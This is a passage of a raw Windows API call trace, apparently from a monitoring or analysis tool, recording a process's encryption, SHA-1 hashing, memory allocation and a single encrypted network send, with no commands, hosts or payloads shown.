[0155.641] CryptEncrypt (in: hKey=0x3e0b98, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10, dwBufLen=0x10 | out: pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10) returned 1 [0155.641] CryptEncrypt (in: hKey=0x3e0b98, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10, dwBufLen=0x10 | out: pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10) returned 1 [0155.641] CryptDestroyKey (hKey=0x3e0b98) returned 1 [0155.641] CryptHashData (hHash=0x3e0ed8, pbData=0x606048, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0155.641] CryptDuplicateHash (in: hHash=0x3e0ed8, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f53c | out: phHash=0x316f53c) returned 1 [0155.642] CryptGetHashParam (in: hHash=0x3e0b98, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x316f4d4, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x316f4d4) returned 1 [0155.642] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0155.642] free (_Block=0x3f65480) [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.642] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f48c*=0x10) returned 1 [0155.643] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f4c4, MessageSeqNo=0x0 | out: pMessage=0x316f4c4) returned 0x0 [0155.643] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0155.644] free (_Block=0x3691680) [0155.644] free (_Block=0x3d81f68) [0155.644] free (_Block=0x3691478) [0155.644] free (_Block=0x3df0550) [0155.644] free (_Block=0x3d81e60) [0155.644] GetTickCount () returned 0x1167bde [0155.644] malloc (_Size=0x10) returned 0x3648e18 [0155.644] free (_Block=0x0) [0155.644] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e18*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0155.644] free (_Block=0x3648e18) [0155.645] GetTickCount () returned 0x1167bde [0155.645] malloc (_Size=0x10) returned 0x3648e90 [0155.645] free (_Block=0x0) [0155.645] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e90*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0155.958] free (_Block=0x3648e90) [0155.958] GetTickCount () returned 0x1167d17 [0155.958] free (_Block=0x0) [0155.958] malloc (_Size=0x24) returned 0x60dd08 [0155.958] free (_Block=0x0) [0155.958] malloc (_Size=0x8) returned 0x3f4c058 [0155.958] free (_Block=0x0) [0155.958] free (_Block=0x0) [0155.958] memchr (_Buf=0x60dd0f, _Val=47, _MaxCount=0x1c) returned 0x60dd25 [0155.958] malloc (_Size=0x17) returned 0x3f651e0 [0155.958] free (_Block=0x0) [0155.958] free (_Block=0x0) [0155.958] memchr (_Buf=0x3f651e0, _Val=58, _MaxCount=0x16) returned 0x0 [0155.958] malloc (_Size=0x8) returned 0x3f4c028 [0155.958] free (_Block=0x0) [0155.958] free (_Block=0x3f4c028) [0155.959] malloc (_Size=0x17) returned 0x3f65380 [0155.959] free (_Block=0x0) [0155.959] free (_Block=0x0) [0155.959] malloc (_Size=0x7) returned 0x3f4bfb8 [0155.959] free (_Block=0x0) [0155.959] free (_Block=0x0) [0155.959] malloc (_Size=0x11) returned 0x3f654a0 [0155.959] free (_Block=0x0) [0155.959] malloc (_Size=0x11) returned 0x3f65320 [0155.959] free (_Block=0x0) [0155.959] malloc (_Size=0xa) returned 0x3648e00 [0155.959] free (_Block=0x0) [0155.959] malloc (_Size=0x10) returned 0x3648ec0 [0155.959] free (_Block=0x0) [0155.959] malloc (_Size=0x50) returned 0x3d9aa38 [0155.959] free (_Block=0x3648ec0) [0155.959] malloc (_Size=0x150) returned 0x3d80ab0 [0155.959] free (_Block=0x3d9aa38) [0155.959] malloc (_Size=0x550) returned 0x3691270 [0155.959] free (_Block=0x3d80ab0) [0155.959] malloc (_Size=0x1550) returned 0x36929c0 [0155.959] free (_Block=0x3691270) [0155.960] malloc (_Size=0x5550) returned 0x348c1b8 [0155.960] free (_Block=0x36929c0) [0155.960] free (_Block=0x0) [0155.960] free (_Block=0x0) [0155.960] free (_Block=0x0) [0155.960] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969d6 [0155.960] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x316f45c | out: phHash=0x316f45c) returned 1 [0155.960] CryptHashData (hHash=0x3e15d8, pbData=0x316f494, dwDataLen=0x5, dwFlags=0x0) returned 1 [0155.960] malloc (_Size=0x14) returned 0x3f65520 [0155.960] free (_Block=0x0) [0155.960] CryptGetHashParam (in: hHash=0x3e15d8, dwParam=0x2, pbData=0x3f65520, pdwDataLen=0x316f454, dwFlags=0x0 | out: pbData=0x3f65520, pdwDataLen=0x316f454) returned 1 [0155.960] CryptDestroyHash (hHash=0x3e15d8) returned 1 [0155.960] malloc (_Size=0x10) returned 0x3648f08 [0155.960] free (_Block=0x0) [0155.960] malloc (_Size=0x44) returned 0x60e9b8 [0155.960] free (_Block=0x3648f08) [0155.960] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x316f49c | out: phHash=0x316f49c) returned 1 [0155.961] CryptHashData (hHash=0x3e1818, pbData=0x60e9b8, dwDataLen=0x1e, dwFlags=0x0) returned 1 [0155.961] malloc (_Size=0x14) returned 0x3f652c0 [0155.961] free (_Block=0x0) [0155.961] CryptGetHashParam (in: hHash=0x3e1818, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x316f494, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x316f494) returned 1 [0155.961] CryptDestroyHash (hHash=0x3e1818) returned 1 [0155.961] free (_Block=0x60e9b8) [0155.961] free (_Block=0x3f65520) [0155.961] malloc (_Size=0x10) returned 0x3648e78 [0155.961] free (_Block=0x0) [0155.961] free (_Block=0x3f652c0) [0155.961] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969d6 [0155.961] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x316f45c | out: phHash=0x316f45c) returned 1 [0155.961] CryptHashData (hHash=0x3e1a18, pbData=0x316f494, dwDataLen=0x5, dwFlags=0x0) returned 1 [0155.961] malloc (_Size=0x14) returned 0x3f652c0 [0155.961] free (_Block=0x0) [0155.961] CryptGetHashParam (in: hHash=0x3e1a18, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x316f454, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x316f454) returned 1 [0155.961] CryptDestroyHash (hHash=0x3e1a18) returned 1 [0155.961] malloc (_Size=0x10) returned 0x3648db8 [0155.961] free (_Block=0x0) [0155.962] malloc (_Size=0x44) returned 0x60e9b8 [0155.962] free (_Block=0x3648db8) [0155.962] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x316f49c | out: phHash=0x316f49c) returned 1 [0155.962] CryptHashData (hHash=0x3e1818, pbData=0x60e9b8, dwDataLen=0x1e, dwFlags=0x0) returned 1 [0155.962] malloc (_Size=0x14) returned 0x3f65280 [0155.962] free (_Block=0x0) [0155.962] CryptGetHashParam (in: hHash=0x3e1818, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x316f494, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x316f494) returned 1 [0155.962] CryptDestroyHash (hHash=0x3e1818) returned 1 [0155.962] free (_Block=0x60e9b8) [0155.962] free (_Block=0x3f652c0) [0155.962] malloc (_Size=0x50) returned 0x3d9af08 [0155.962] free (_Block=0x3648e78) [0155.962] free (_Block=0x3f65280) [0155.962] free (_Block=0x348c1b8) [0155.962] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x14, pbBuffer=0x316f5f4 | out: pbBuffer=0x316f5f4) returned 1 [0155.962] SetEvent (hEvent=0x3a4) returned 1 [0155.963] malloc (_Size=0x14) returned 0x3f652c0 [0155.963] free (_Block=0x0) [0155.963] free (_Block=0x0) [0155.963] malloc (_Size=0x1fd) returned 0x606108 [0155.963] free (_Block=0x0) [0155.963] CryptHashData (hHash=0x3e0b98, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0155.963] CryptDuplicateHash (in: hHash=0x3e0b98, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f4fc | out: phHash=0x316f4fc) returned 1 [0155.963] malloc (_Size=0x14) returned 0x3f65280 [0155.963] free (_Block=0x0) [0155.963] CryptGetHashParam (in: hHash=0x3e1a18, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x316f494, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x316f494) returned 1 [0155.963] CryptDestroyHash (hHash=0x3e1a18) returned 1 [0155.963] free (_Block=0x3f65280) [0155.963] malloc (_Size=0x1fd) returned 0x3d81e60 [0155.963] free (_Block=0x0) [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.963] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.964] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] malloc (_Size=0x1fd) returned 0x3691270 [0155.965] free (_Block=0x0) [0155.965] free (_Block=0x0) [0155.965] free (_Block=0x3d81e60) [0155.965] free (_Block=0x606108) [0155.965] malloc (_Size=0x1fd) returned 0x606108 [0155.965] free (_Block=0x0) [0155.965] malloc (_Size=0x1fd) returned 0x3d81e60 [0155.965] free (_Block=0x0) [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.965] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, 